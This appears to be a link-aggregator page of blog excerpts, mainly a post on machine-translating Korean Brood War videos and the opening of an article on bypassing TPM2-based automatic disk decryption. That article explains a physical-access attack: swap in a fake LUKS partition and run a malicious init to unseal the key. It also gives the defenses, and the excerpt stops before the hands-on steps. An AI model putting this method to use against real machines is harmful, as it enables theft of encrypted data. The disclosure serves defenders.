You can ei­ther open an is­sue or send a mes­sage at con­tact@dal­ibo.com.


Read the original on postgresql-anonymizer.readthedocs.io »

9 187 shares, 34 trendiness

Brood War Korean Translations

As work slowed down dur­ing the last cou­ple of weeks of 2024, I de­cided to redi­rect some of my en­ergy to hob­bies in­stead of work. One such hobby is StarCraft: Brood War (or BW for short), a clas­sic, highly com­pet­i­tive RTS from 98 that still has an ac­tive com­mu­nity to­day. Over those cou­ple of weeks, I was able to make great progress in solv­ing a decades-old prob­lem in the BW com­mu­nity, us­ing a mix of LLMs and free (gratis*) soft­ware.Un­der­stand­ing the cul­tural con­text BW ex­ists in is cru­cial to un­der­stand the rest of this post. High-level BW is — for all in­tents and pur­poses — a Korean game. The over­whelm­ing ma­jor­ity of pro­fes­sional play­ers, teams, and tour­na­ments (as well as most of the pas­sion­ate au­di­ence and com­mu­nity) are based in Korea, and have been for 20+ years. This is so in­grained in the BW cul­ture that us mem­bers of the com­mu­nity who are not Korean call our­selves foreigners,” a slightly self-con­de­scend­ing term.Sim­i­larly to chess, BW is a game of strat­egy with a long his­tory of recorded games. As such, play­ing the game is only half the chal­lenge; study­ing it just as im­por­tant (especially at higher lev­els of play). For decades, the BW com­mu­nity (both Korean and for­eigner) has watched and an­a­lyzed pro­fes­sional matches from years past and de­rived valu­able strate­gic in­sights from them. Note: given the na­ture of BW as a video game, much of the mod­ern dis­course takes place in videos and live streams pub­lished by pro­fes­sional BW play­ers.Con­tin­u­ing to use chess as an anal­ogy, you might know that chess open­ers are col­lec­tions of well-stud­ied first moves for chess. The in­ter­ac­tions be­tween white-piece open­ers and black-piece open­ers have been an­a­lyzed for decades (centuries?), and their study is con­sid­ered fun­da­men­tal for be­gin­ner and in­ter­me­di­ate chess play­ers. The only as­pect of these open­ers you need to fo­cus on for this post is how these open­ers shape the lan­guage used by the chess com­mu­nity. Terms like Sicilian de­fense”, and its Najdork vari­a­tion”, Dragon vari­a­tion”, or Accelerated Dragon vari­a­tion” are all com­mu­nity-de­vel­oped names. None of these terms are writ­ten in the rules of chess. They are part of a do­main-spe­cific lan­guage the com­mu­nity it­self has de­vel­oped, con­dens­ing and com­mu­ni­cat­ing the afore­men­tioned decades of study and analy­sis ef­fec­tively.This as­so­ci­a­tion of lan­guage and his­tory, com­bined with the great di­vide be­tween the Koreans and foreigners,” leads us to what is com­monly called the Foreigner Knowledge prob­lem.Very few of mem­bers of the for­eigner com­mu­nity are flu­ent in Korean. Foreigner ac­cess to Korean BW dis­course is a con­tra­dict­ing con­cept: if you speak Korean flu­ently, you have no rea­son to be in the for­eigner com­mu­nity, as it only has ac­cess to ma­te­r­ial that is strictly in­fe­rior and more lim­ited. For this rea­son, Korean-speaking mem­bers in the for­eigner com­mu­nity are ex­ceed­ingly rare.In an ef­fort to gain ac­cess to the Korean dis­course, we have crowd­funded money to pay these (acquiescing) Korean-speaking for­eign­ers to trans­late the sub­ti­tles of YouTube videos. Everyone in­volved knows the trans­la­tion work is tax­ing and slow, and that the pay is ob­jec­tively ter­ri­ble. Nevertheless, this ap­proach has af­forded the com­mu­nity a few dozen videos a year to be trans­lated.As an al­ter­na­tive, we have re­lied on ma­chine trans­la­tion of text con­tent in­stead. While ma­chine trans­la­tion tools like Google Translate are good at trans­lat­ing every­day sen­tences, they are ill-suited for do­main-spe­cific lan­guages, as they are full of jar­gon to which the trans­la­tion tool has not been ex­posed. To add in­sult to in­jury, trans­lat­ing such jar­gon lit­er­ally is ac­tu­ally counter-pro­duc­tive.To il­lus­trate this, here’s an ex­cerpt of the sub­ti­tles from a Korean video tu­to­r­ial, about the BW-equivalent of an opener (called a build or­der, or sim­ply build):And here is the Google Translate ver­sion:Hello, to­day’s lec­ture is about the 12 court­yard build. I will briefly but in de­tail ex­plain the types, pros and cons of the 12 court­yard, and the build or­der. In the Toss match, it is the build used when you want to start the most af­flu­ently. In the Terran match, there are var­i­ous builds that can be done with the 12 court­yard. So I will tell you about some of the most used builds. The first is the two-pro­cess­ing build, which starts with the 12 court­yard. 12 court­yard 11 spawn­ing pool 10 gas Now, this is a build that uti­lizes fast gas. This build is of­ten used when play­ing with the two-pro­cess­ing build while quickly bring­ing the 3-processing to the 3-gas multi. The sec­ond is the 12 pres­sure 12 pool 12 gas mod­er­ately fast tech tree and mod­er­ately fast 3-processing build. 12 pres­sure 12 gas mod­er­ately fast tech tree and mod­er­ately fast 3-processing build. In the case of this build, many peo­ple talk about it as a build that is fast at both Mutalisk and 3-point pro­cess­ing.You might be con­fused if you are not a BW player. Consider your­self lucky, be­cause I promise you you’d be flab­ber­gasted if you did play the game.Any­one fa­mil­iar with BW will tell you that trans­la­tion’s sig­nal-to-noise ra­tio is well be­low 1/9000. There are no courtyards” in BW. Starting off the most af­flu­ently” is an awk­ward and ver­bose way to say this is an eco­nomic opener/​build.” What the hell is a 3-point pro­cess­ing”?!Sure, there are a few other rec­og­niz­able… ut­ter­ances, such as Toss” (Protoss), build”, fast gas”, moderately fast tech-tree” and Terran” — but the over­whelm­ing ma­jor­ity of it has been trans­lated lit­er­ally and is noth­ing but noise, de­stroy­ing any con­text that might have re­deemed those few rec­og­niz­able bits.The com­bi­na­tion of poor au­to­matic sub­ti­tles and lit­er­ally-trans­lated jar­gon has caused the Foreigner com­mu­nity to lag be­hind the Korean com­mu­nity for decades.This is what we are now able to achieve with my new ma­chine trans­la­tion process:Hello, to­day’s lec­ture will cover the 12 Natural build. I’ll ex­plain the types, pros, and cons of the 12 Natural build and pro­vide a sim­ple yet de­tailed build or­der. This build is used when you want to start the most eco­nom­i­cally against Protoss. Against Terran, there are mul­ti­ple builds you can use with the 12 Natural. I’ll go over some of the most pop­u­lar ones. The first one is the two-Hatch­ery build. Starting with the 12 Natural al­lows for the most eco­nom­i­cally strong open­ing. The 12 Natural goes with an 11 Spawning Pool and a 10 Gas. This is a build uti­liz­ing fast gas. It’s of­ten used to play with a quick third Hatchery and three gas ex­pan­sions when do­ing the two-Hatch­ery build. The sec­ond is the 12 Hatch, 12 Pool, 12 Gas. It’s a bal­anced build with a mod­er­ate tech tree and a mod­er­ately fast third Hatchery. First, I’ll briefly talk about a quick de­fense build strat­egy. Next, we’ll dis­cuss how you can man­age re­sources op­ti­mally for this setup and han­dle tran­si­tions smoothly. Though there are risks, it al­lows for a sta­ble and dy­namic ap­proach in longer games. Even for non-play­ers, the above trans­la­tion should be much more rea­son­able than the pre­vi­ous Google Translate ver­sion. For BW play­ers, it is im­me­di­ately clear what the video is about. While this is by no means a per­fect trans­la­tion (there are im­prove­ments to be made, as will be noted in the footer of this post), the sig­nal-to-noise ra­tio has been dra­mat­i­cally re­duced.Fur­ther­more, in con­trast to the pre­vi­ous pace of a few dozen videos a year, I ended up trans­lat­ing about 7 videos in a sin­gle day. As a sin­gle per­son. During my spare time.The least I can say is: from now on, this is the worst this will ever be!The process is di­vided into two parts: pro­duc­ing sub­ti­tles, and con­sum­ing sub­ti­tles. The production” part is aimed at mem­bers of the com­mu­nity who are up to date with the Korean con­tent, and know which videos should be pri­or­i­tized. The consumption” part is aimed at every­one else who sim­ply want to watch the trans­lated videos.I ini­tially used yt-dlp to down­load YouTube’s au­to­matic Korean sub­ti­tles to try and trans­late them. As shown above, though, they are use­less. So in­stead of down­load­ing the sub­ti­tles, I use yt-dlp to down­load the au­dio track of the videos.With the au­dio tracks down­loaded, I tran­scribed my own sub­ti­tles from them us­ing Whisper. I am not sure why, but tran­scrib­ing the Korean sub­ti­tles us­ing AI (rather than what­ever it is YouTube uses) pro­vided much more clean and com­plete re­sults. It also seems to do a bet­ter job of ig­nor­ing in-game sounds and other noise (such as mouse clicks).When I first started de­vel­op­ing this process, I was run­ning Whisper lo­cally, us­ing ~10GB of VRAM. I quickly saw that this would be far too re­stric­tive if I wanted to have oth­ers col­lab­o­ra­tors trans­lat­ing (install Python on Windows, cre­ate a venv, in­stall CUDA, in­stall git…). So, I de­cided to find an al­ter­na­tive.Whis­per is in­stalled through Python’s pip, and Google Colab is not just a free Jupyter note­book ser­vice — it also of­fers free GPUs, which hap­pen to have just enough VRAM to run Whisper!Creating a note­book and shar­ing a pa­ra­me­ter­ized, read-only ver­sion of it was an ideal dis­tri­b­u­tion model for this kind of work. With a lit­tle doc­u­men­ta­tion, it al­lowed non-tech­ni­cal peo­ple to run it ef­fort­lessly, no mat­ter their hard­ware. Furthermore, I could up­date the note­book with fea­tures (aka bugs), and peo­ple would re­ceive those up­dates au­to­mat­i­cally (ie. mak­ing it even more ac­ces­si­ble, no git cloning, no con­stant down­loads).The note­book I cre­ated re­ceives one pa­ra­me­ter — the YouTube URL — and gen­er­ates+down­loads an SRT file in Korean.All of this was neat, but I still had­n’t done the fun­da­men­tal work of trans­lat­ing from Korean to English.To say that this en­tire pro­ject stands on the shoul­ders of gi­ants would be an un­der­state­ment.TeamLiq­uid (TL) is the longest, old­est for­eigner (or at least, amer­i­can) BW com­mu­nity. As it turns out, some­time around 15 years ago, one TL mem­ber called kon­adora cre­ated a fo­rum post with a dic­tio­nary of BW slang used by com­men­ta­tors.” I copied the post into a sim­ple mark­down file, KoreanSlang.txt, and pro­vided it to the mod­ern er­a’s fa­vorite piece of tech­nol­ogy: an LLM!Despite the mul­ti­ple (and mul­ti­ply­ing) mis­uses of LLMs, this prob­lem was fun­da­men­tally a lan­guage prob­lem, which is a per­fect use of LLMs.I will give you sub­ti­tles for you to trans­late from Korean to English, us­ing the KoreanSlang.txt” file for sup­port. Always con­sider that the con­tent you are trans­lat­ing ex­ists within the con­text of Starcraft: Brood War. Feel free to adapt the trans­la­tion, as clar­ity is more im­por­tant than a lit­eral trans­la­tion. Always re­spect the time­stamps and the file for­mat­ting, but feel free to cor­rect du­pli­cate sub­ti­tles or ob­vi­ous mis­takes. Short translator notes” may be wel­come if ap­pro­pri­ate (embedded as sub­ti­tles). Do not add quo­ta­tion marks if they were not pre­sent orig­i­nally. Some of the sub­ti­tles may have some noise or er­rors; please re­place them with (unintelligible)” if you find them. Format the out­put as code (ie. sur­rounded by triple back-ticks) for eas­ier copy-past­ing.And a Pro (Premium? Plus? who knows) ChatGPT ac­count, it was a sim­ple mat­ter of pro­vid­ing the Korean sub­ti­tles gen­er­ated by Whisper, and ask­ing it to trans­late its con­tents.At first, I sim­ply took trans­lated sub­ti­tles, down­loaded the cor­re­spond­ing video, and ap­plied them us­ing my lo­cal video player —  which meant that, once again, I had to fig­ure out a way to make these sub­ti­tles ac­ces­si­ble to oth­ers.Note: No al­tru­ism or as­pi­ra­tion for good prod­uct de­sign played a part in this. My ISP im­poses a data cap, and charges me dou­ble if I ever ex­ceed it — so down­load­ing videos left and right was not an op­tion! >:(A big con­sid­er­a­tion is that YouTube has its own sub­ti­tles fea­ture, but only the video owner can set or up­date a video’s sub­ti­tles. Wanting to avoid the whole down­load, re-up­load, set sub­ti­tle work cy­cle, I de­cided to build a so­lu­tion that was ac­ces­si­ble and saved me time (and band­width).I wrote a UserScript that adds a but­ton to YouTube videos, and down­loads the cor­re­spond­ing trans­lated sub­ti­tles if they ex­ist. It is able to parse SRT and VTT files, and shows them in a tiny lit­tle con­tainer be­low the YouTube player.It looks like a but­ton straight from Web 1.0, and I love it. I call it the BWKT Client.And, well… the men­tion of a Client im­plies the ex­is­tence of a Server.Subtitles are fun­da­men­tally text files, and I needed a quick and easy way to share text files. Pastebin im­me­di­ately came to mind as a po­ten­tial can­di­date, if only for the proof-of-con­cept. It is sim­ple to use, I have a pre­mium ac­count for it, and I did not (and still do not) ex­pect traf­fic to be a con­cern in any way.Note: there is noth­ing more per­ma­nent than a tem­po­rary so­lu­tion.All I need is two columns: YouTube URL, and Subtitle URL (and maybe a third col­umn, Language, but that’s for later). Using Google Sheets as a data­base is ideal for this use case, as it is ex­tremely easy to man­u­ally in­spect and up­date, and it is also triv­ial to share with oth­ers. The cherry on top is Google’s Apps Script, which is ba­si­cally a JavaScript run­time that has first-party ac­cess to Google Workspace, which in­cludes Google Sheets; and it has a built-in web server to boot!It was lit­er­ally a mat­ter of writ­ing func­tion do­Get(req) { /* … */ } , which re­ceives a YouTube video ID (the eleven-char­ac­ter iden­ti­fier at the end of https://​youtube.com?v=XXXXXXXXXXX), and re­turns the cor­re­spond­ing paste­bin URL.There are cer­tainly im­prove­ments to be made. I still see this pro­ject as a hacked-to­gether con­trap­tion built over the course of two weeks, with a bud­get of ~$30 USD (I paid for ChatGPT and more GPU time in Colab, nei­ther of which are strictly re­quired but were nice to have).One such im­prove­ment is sup­port­ing mul­ti­ple lan­guages in the UserScript. After all, the Foreigner com­mu­nity com­prises not just American play­ers, but also Mexican, Polish, Romanian, Chinese, Taiwanese — there’s dozens of lan­guages that these videos could be trans­lated to, and it would take only a small amount of ef­fort to do.There are tech­ni­cal im­prove­ments to be made as well. For ex­am­ple: right now, the BWKT Client shows the but­ton be­low every YouTube video, even if sub­ti­tles are not avail­able for that par­tic­u­lar video. I could (should?) add an­other end­point to the AppsScript web server that re­turns an in­dex of trans­lated videos, and then the ex­ten­sion could show/​hide the but­ton ap­pro­pri­ately.Note: Speaking of which, here is the pub­lic-fac­ing, read-only data­base!Af­ter all was said and done, I reached out to a few fel­low BW en­joy­ers to put the sub­ti­tles to the test. The in­ten­tion was to judge the qual­ity of the trans­la­tion process and to see if the sub­ti­tles worked well on YouTube. We hopped on a Voice Chat, I streamed my screen, and we started watch­ing a 13-minute long video.About 5 min­utes in, I had to pause the video and take a step back. As it turns out, the group had been watch­ing the video, and read­ing the sub­ti­tles, yes — but we also had been mak­ing com­ments among our­selves, re­play­ing short clips from the video, paus­ing it to dis­cuss… and in the mid­dle of it all, we had for­got­ten what we were orig­i­nally try­ing to do: eval­u­at­ing the qual­ity of the sub­ti­tles.Need­less to say, the sub­ti­tles passed the test. :)One sneaky as­pect of this pro­ject that worked well in my fa­vor is that per­for­mance is not crit­i­cal, nor is scale, or la­tency, or any­thing else that most soft­ware pro­jects of­ten deal with. Most of what I did was glue al­ready-ex­ist­ing so­lu­tions to­gether. The cus­tom busi­ness logic (the UserScript, and the Python code in the Colab note­book) is short, and ef­fort­lessly main­tain­able. The web server is the sim­plest pro­duc­tion CRUD sys­tem ever, and I see no rea­son for it to ever grow in com­plex­ity in any sig­nif­i­cant way.It’s the janki­est pro­ject I have shipped, and I love it.

As is in­evitable, I al­ready shot my­self in the foot, caus­ing a build er­ror on all pro­jects si­mul­ta­ne­ously. Fortunately, I was able to di­ag­nose the is­sue and ul­ti­mately fix it in ~1 hour, with no prior knowl­edge what­so­ever.


I cloned the pro­ject repo, in­stalled Visual Studio 2013, and reg­is­tered

Here is the list of all re­sources I will be us­ing.


While Linux is my OS of choice for de­vel­op­ment, it is only ex­per­i­men­tally sup­ported, not of­fi­cially so. Furthermore, the SDK must have been de­vel­oped in Windows (for Windows) orig­i­nally, which gives me con­fi­dence in get­ting it in­stalled and

This blog doc­u­ments my jour­ney learn­ing how to build a game us­ing VALVe’s Source Engine.

About this blog

My goals with this jour­ney are:

1. To spend the next year us­ing Source reg­u­larly (at least once a week); 2. To doc­u­ment all the prob­lems and their cor­re­spond­ing so­lu­tions,


Read the original on blog.sourcedive.net »

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Bypassing disk encryption on systems with automatic TPM2 unlock

Have you setup au­to­matic disk un­lock­ing with TPM2 and

sys­temd-crypten­roll or cle­vis? Then chances are high that your disk can be de­crypted by an at­tacker who just has brief phys­i­cal ac­cess to your ma­chine - with some prepa­ra­tion, 10 min­utes will suf­fice. In this ar­ti­cle we will ex­plore how TPM2 based disk de­cryp­tion works, and un­der­stand why many se­tups are vul­ner­a­ble to a kind of filesys­tem con­fu­sion at­tack. We will fol­low along by ex­ploit­ing two dif­fer­ent real sys­tems (Fedora + cle­vis, NixOS + sys­temd-crypten­roll).# Examples com­mands used to en­roll a key into the TPM. Whether your sys­tem is # suf­fers from this is­sue does not de­pend on which PCRs you choose here. sys­temd-crypten­roll –tpm2-pcrs=0+2+7 –tpm2-device=auto

TL;DR: Most TPM2 un­lock se­tups fail to ver­ify the LUKS iden­tity of the de­crypted par­ti­tion. Since the ini­trd must re­side in an un­en­crypted boot par­ti­tion, an at­tacker can in­spect it to learn how it de­crypts the disk and also what type of filesys­tem it ex­pects to find in­side. By recre­at­ing the LUKS par­ti­tion with a known key, we can con­fuse the ini­trd into ex­e­cut­ing a ma­li­cious

init ex­e­cutable. Since the TPM state will not be al­tered in any way by this fake par­ti­tion, the orig­i­nal LUKS key can be un­sealed from the TPM. Afterwards, the ini­tial disk state can be fully re­stored and then de­crypted us­ing the ob­tained key.

You are safe if you ad­di­tion­ally use a pin to un­lock your TPM, or use an ini­trd that prop­erly as­serts the LUKS iden­tity (which would in­volve man­ual work, so you’d prob­a­bly know if that is the case).

The idea be­hind se­cure and pass­word-less disk de­cryp­tion is that the TPM2 can store an ad­di­tional LUKS key which your sys­tem can only re­trieve, if the TPM is in a pre­de­ter­mined, known-good state. This state is recorded in the so-called Platform Configuration Registers (PCRs), of which there are 24 in a stan­dard com­pli­ant TPM. Their in­tended use is de­scribed in the Linux TPM PCR Registry but also neatly sum­ma­rized as a table in the sys­temd-crypten­roll(1) man page.

These reg­is­ters store hashes which are suc­ces­sively up­dated while boot­ing based on in­for­ma­tion like the boot­laoder hash, the firmware in use, the booted ker­nel, ini­trd im­age and a lot more things. By es­tab­lish­ing a chain of trust through all com­po­nents in­volved in boot­ing up to the linux user­space, we can en­sure that al­ter­ing any com­po­nent will af­fect one or sev­eral PCRs. Storing data in the TPM re­quires you to se­lect a list of PCRs and it will en­sure that the data can only be re­trieved again if all of these PCRs are in the same state as when en­rolling the se­cret.

Several of these reg­is­ters have an agreed-upon pur­pose and are up­dated with some spe­cific in­for­ma­tion about your sys­tem, such as your board’s firmware, your BIOS con­fig­u­ra­tion, OptionROMs (extra firmware loaded from ex­ter­nal de­vices such as PCIe de­vices af­ter POST), the se­cure boot pol­icy, or other things. Here’s an ex­cerpt from the man page from above con­tain­ing some of the reg­is­ters that are im­por­tant to us:Ex­pla­na­tion­Se­cure Boot state; changes when UEFI SecureBoot mode is

en­abled/​dis­abled, or firmware cer­tifi­cates (PK, KEK, db, dbx, …)

changes.sys­temd-crypt­setup(8) op­tion­ally mea­sures the vol­ume key of

ac­ti­vated LUKS vol­umes into this PCR. sys­temd-pcr­ma­chine.ser­vice(8)

mea­sures the ma­chine-id(5) into this PCR. sys­temd-pcrfs@.ser­vice(8)

mea­sures mount points, file sys­tem UUIDs, la­bels, par­ti­tion UUIDs

of the root and /var/ filesys­tems into this PCR.

Below this list, an in­ter­est­ing piece of in­for­ma­tion is given in the man page about the in­tended use of PCRs for en­crypted vol­umes:In gen­eral, en­crypted vol­umes would be bound to some com­bi­na­tion of PCRs 7, 11, and 14 (if shim/​MOK is used). In or­der to al­low firmware and OS ver­sion up­dates, it is typ­i­cally not ad­vis­able to use PCRs such as 0 and 2, since the pro­gram code they cover should al­ready be cov­ered in­di­rectly through the cer­tifi­cates mea­sured into PCR 7. Validation through cer­tifi­cates hashes is typ­i­cally prefer­able over val­i­da­tion through di­rect mea­sure­ments as it is less brit­tle in con­text of OS/firmware up­dates: the mea­sure­ments will change on every up­date, but sig­na­tures should re­main un­changed. See the Linux TPM PCR Registry for more dis­cus­sion.

If you en­roll your own se­cure boot keys and use a Unified Kernel Image (UKI), then us­ing just PCR 7 will be suf­fi­cient to en­sure in­tegrity up to the point where we need to un­lock our disk. Some dis­tri­b­u­tions in­stead ship EFI ex­e­cuta­bles that are pre-signed with the Microsoft keys, which al­lows them to en­able se­cure boot by de­fault with­out re­quir­ing the user to gen­er­ate and en­roll any­thing on their own. Since this also means that the user can­not sign their ker­nel and/​or ini­trd im­age, a trusted and pre-signed shim is of­ten used to mea­sure the hash of the ker­nel and ini­trd be­fore ex­e­cut­ing them into PCR 9, which we would want to use in that case. Another ap­proach is to have the user gen­er­ate a so-called Machine Owner Key (MOK) if they want to sign some­thing, in which case PCR 14 should be used, too.

So the ex­act PCR se­lec­tion may change a bit de­pend­ing on the user’s setup. A quick search on GitHub or on the in­ter­net re­veals that many peo­ple still opt to use ad­di­tional PCRs like 0 and 2 in ad­di­tion to 7, which is of course fine but may re­sult in keys be­com­ing in­ac­ces­si­ble when the BIOS or some firmware is up­dated - which can be an­noy­ing.

If you al­ready have se­cure boot set up, con­fig­ur­ing TPM2 un­lock for your LUKS par­ti­tion is usu­ally very sim­ple. Most guides will re­sort to sys­temd-crypten­roll or cle­vis

which are dif­fer­ent im­ple­men­ta­tions that in­ter­nally do some vari­a­tion of the fol­low­ing:Seal this key in your TPM based on your se­lec­tion of PCRsStore the en­crypted TPM con­text in the LUKS to­ken meta­data

which is re­quired to un­seal the se­cret at a later point in


Both cle­vis and sys­temd-crypten­roll

can store to­kens in other ways than a TPM2, for ex­am­ple us­ing a FIDO2 key. I found that cle­vis also sup­ports re­triev­ing to­kens from net­work re­sources, but other than that the two tools are very sim­i­lar in what they do.

sys­temd-crypten­roll just comes pre-pack­aged with

sys­temd so it is usu­ally a bit sim­pler to use. Here is an ex­am­ple:sys­temd-crypten­roll –tpm2-pcrs=7 –tpm2-device=auto /dev/nvme0n1p3

In the­ory, the disk is now prop­erly pro­tected, as­sum­ing the ker­nel com­mand line can­not be edited, right? It can only be de­crypted if PCR 7 is un­changed, and any­thing we would do to the boot­loader, ker­nel or ini­trd would af­fect PCR 7.

Well, of course, I would­n’t be ask­ing if there was­n’t a tiny caveat: Assuming all disks were mounted prop­erly, the ini­trd can be cer­tain that no code has been mod­i­fied up to this point. But it does not au­to­mat­i­cally en­sure that the data on them is au­then­tic. As the very last step, the ini­trd will ex­e­cute the

init ex­e­cutable of the real sys­tem, which usu­ally does­n’t un­dergo any kind of sig­na­ture check be­fore it is ex­e­cuted. And why would it have to - af­ter all it is part of the en­crypted root par­ti­tion which can­not be al­tered by an at­tacker.

First of all, it is im­por­tant to know that the ini­trd will fall back to a pass­word prompt, if TPM un­lock­ing fails for what­ever rea­son. A BIOS up­date could al­ways cause the se­cure boot data­base to be al­tered (thus in­val­i­dat­ing PCR 7), or some­body makes a mis­take when up­dat­ing the sys­tem and for­gets to sign the ker­nel and ini­trd prop­erly. In such a case you don’t want to be locked out from your sys­tem com­pletely, so ask­ing for the pass­word is a sane thing to do.

But that also means if we re­place the en­crypted par­ti­tion with a new LUKS par­ti­tion (for which we choose the pass­word), then the TPM de­cryp­tion will fail and we will be asked for the pass­word, which we con­trol. After en­ter­ing the pass­word, the ini­trd will now think it has de­crypted the par­ti­tion cor­rectly and pro­ceed. If we man­age to put the cor­rect kind of filesys­tem in­side of our fake LUKS par­ti­tion so that the ac­tual mount­ing suc­ceeds, we can ship a ma­li­cious init bi­nary that now has full ac­cess to the un­locked TPM, thus al­low­ing us to de­crypt the orig­i­nal filesys­tem, which we would have to backup be­fore cre­at­ing our ma­li­cious par­ti­tion.

Now you might think the ini­trd can sim­ply ver­ify the filesys­tem UUID be­fore mount­ing it since we can­not read it from the disk, but re­mem­ber that any­thing the ini­trd knows is pub­lic knowl­edge, as the boot par­ti­tion and ini­trd im­age are not en­crypted. So we can just reuse the same LUKS UUID and filesys­tem UUID if nec­es­sary.

To solve this, we need to be able to au­then­ti­cate all en­crypted vol­umes be­fore ac­cess­ing any file on them. In this

ar­ti­cle by Lennart Poettering from October 2022, where he de­scribes the state of se­cure boot in sys­temd, he men­tions how the process should look like to make the sys­tem se­cure. It is a bit in­volved so let me re­it­er­ate the im­por­tant part.

After a disk has been un­locked, we want to de­rive a value from its vol­ume key (the mas­ter key used to en­crypt all its data) and use this value to ex­tend PCR 15. This en­sures that any fake vol­ume would change this value since the orig­i­nal vol­ume key can­not be known. Using sys­temd-crypt­setup in­stead of

crypt­setup can al­ready take care of this by adding

tpm2-mea­sure-pcr=yes to the crypt­tab file.

If we now en­sure that the disk de­cryp­tion or­der is de­ter­min­is­tic, then we can com­pare the value in PCR 15 against a known and signed value in the ini­trd. If the wrong value is ob­served, the ini­trd can now abort the boot process be­fore ex­e­cut­ing any­thing ma­li­cious.

There are loads of guides that de­scribe in more de­tail how to setup TPM2 based disk un­lock­ing, and while the con­cept is al­ways the same, you will cer­tainly find one ad­justed to your fa­vorite dis­tri­b­u­tion. Here’s a list of guides that I found on­line, sorted by date:[HowTo] Using Secure Boot and TPM2 to un­lock LUKS par­ti­tion on

boot (2024/01, Manjaro, sys­temd-crypten­roll)The

ul­ti­mate guide to Full Disk Encryption with TPM and Secure Boot

(2022/04, Debian, tpm2-initramfs-tool)

Unfortunately, I did not find any guide that ad­dresses this, so most user se­tups are prob­a­bly suf­fer­ing from this is­sue. Though in all fair­ness, whether this is an is­sue to you ob­vi­ously de­pends on your threat model. If you are us­ing the TPM just to un­lock your home server which no­body else has phys­i­cal ac­cess to, then maybe this is a non-is­sue to you. But if you use this to pro­tect the data on your lap­top against theft, then chances are you want to set a TPM pin or im­ple­ment PCR 15 ver­i­fi­ca­tion as ex­plained above.

Notably, I found that the ArchWiki en­try of sys­temd-crypten­roll

ac­knowl­edges this is­sue in a warn­ing near the end of the ar­ti­cle:Only bind­ing to PCRs mea­sured pre-boot (PCRs 0-7) opens a vul­ner­a­bil­ity from rogue op­er­at­ing sys­tems. A rogue par­ti­tion with meta­data copied from the real root filesys­tem (such as par­ti­tion UUID) can mimic the orig­i­nal par­ti­tion. Then, initramfs will at­tempt to mount the rogue par­ti­tion as the root filesys­tem (decryption fail­ure will fall back to pass­word en­try), leav­ing pre-boot PCRs un­changed. The rogue root filesys­tem with files con­trolled by an at­tacker is still able to re­ceive the de­cryp­tion key for the real root par­ti­tion. See Brave New Trusted Boot World and BitLocker doc­u­men­ta­tion for ad­di­tional in­for­ma­tion.

And while this is cor­rect, just us­ing any of the PCRs 8-23 does­n’t au­to­mat­i­cally pro­tect your data ei­ther. The ini­trd still has to en­sure that the re­spec­tive PCR is changed be­fore ex­e­cut­ing the sys­tem’s init bi­nary, which is not done by de­fault.

Now, let’s have a look at a real sys­tem which we will setup in a sim­i­lar way to how any­one else would have done it. I’ve picked one of the Fedora ar­ti­cles above, but you can ex­pect this to work for all of the other dis­tri­b­u­tions, too. In sum­mary, my setup in­cluded the fol­low­ing steps:En­able se­cure boot in the BIOS (and in­stall the Microsoft keys

since Fedora is signed with those keys)

An in­ter­est­ing thing we no­tice right away is that the Fedora boot­loader is signed us­ing the Microsoft keys. We’ve al­ready briefly talked about this in the be­gin­ning, this means it can­not sign the ini­trd at all. Instead, they have a signed shim that is ex­e­cuted af­ter the boot­loader which will cal­cu­late hashes of the ker­nel and ini­trd and ex­tend PCR 9 with those val­ues. Therefore, it is crit­i­cal that we now in­clude PCR 9 in our se­lec­tion when en­rolling the key to the TPM, oth­er­wise the ini­trd could just be mod­i­fied.

This ap­proach has the ad­van­tage that the user does­n’t have to deal with cus­tom se­cure boot keys, but the down­side is that every ker­nel or ini­trd up­date will af­fect the value in PCR 9, thus re­quir­ing us to re-en­roll the key af­ter re­boot­ing on each sys­tem up­date. Here is a snap­shot of my PCRs when I en­rolled the key into the TPM. This is also the state that we need to reach later to suc­ceed.[root@lo­cal­host]# sys­temd-an­a­lyze pcrs NR NAME SHA256 0 plat­form-code 8c2af609e626cc1687f66ea6d0e1a3605a949319514a26e7e1a90d6a35646fa5 1 plat­form-con­fig 299b0462537a9505f6c63672b76a3502373c8934f08a921e1aa50d3adf4ba83d 2 ex­ter­nal-code 3d458cfe55cc03ea1f443f1562beec8df51c75e14a9fcf9a7234a13f198e7969 3 ex­ter­nal-con­fig 3d458cfe55cc03ea1f443f1562beec8df51c75e14a9fcf9a7234a13f198e7969 4 boot-loader-code 5fdbd66c267bd9513dbc569db0b389a37445e1aa463f9325ea921563e7fb37eb 5 boot-loader-con­fig 38a281376260137602e5c70f7a9057e4c55830d22a02bb5a66013d6ac2576d2f 6 host-plat­form 3d458cfe55cc03ea1f443f1562beec8df51c75e14a9fcf9a7234a13f198e7969 7 se­cure-boot-pol­icy 4770a4fb1dac716feaddd77fec9a28bb2015e809a34add1a9d417eec36ec1e17 8 - e3e23c0­da36­fa31767885aec7aee3180f­b2f5e0b67569c3a82c2a1c3­ca88a651 9 ker­nel-ini­trd 091f6917b0c8788779f4d410046250e6747043a8cd1bd75bf90713cc6de30d99 10 ima 2566bdf57c3aa880f7b0c480f479c0a88e0e72ae7ef3c1888035e7238bbe9257 11 ker­nel-boot 0000000000000000000000000000000000000000000000000000000000000000 12 ker­nel-con­fig 0000000000000000000000000000000000000000000000000000000000000000 13 sy­sexts 0000000000000000000000000000000000000000000000000000000000000000 14 shim-pol­icy 17cdefd9548f4383b67a37a901673bf3c8ded6f619d36c8007562de1d93c81cc 15 sys­tem-iden­tity 0000000000000000000000000000000000000000000000000000000000000000 16 de­bug 0000000000000000000000000000000000000000000000000000000000000000 17 - ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 18 - ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 19 - ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 20 - ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 21 - ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 22 - ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 ap­pli­ca­tion-sup­port 0000000000000000000000000000000000000000000000000000000000000000

Now, let’s pre­tend we don’t know any­thing about the sys­tem and that we just ob­tained phys­i­cal ac­cess to the ma­chine, which was pow­ered-off.

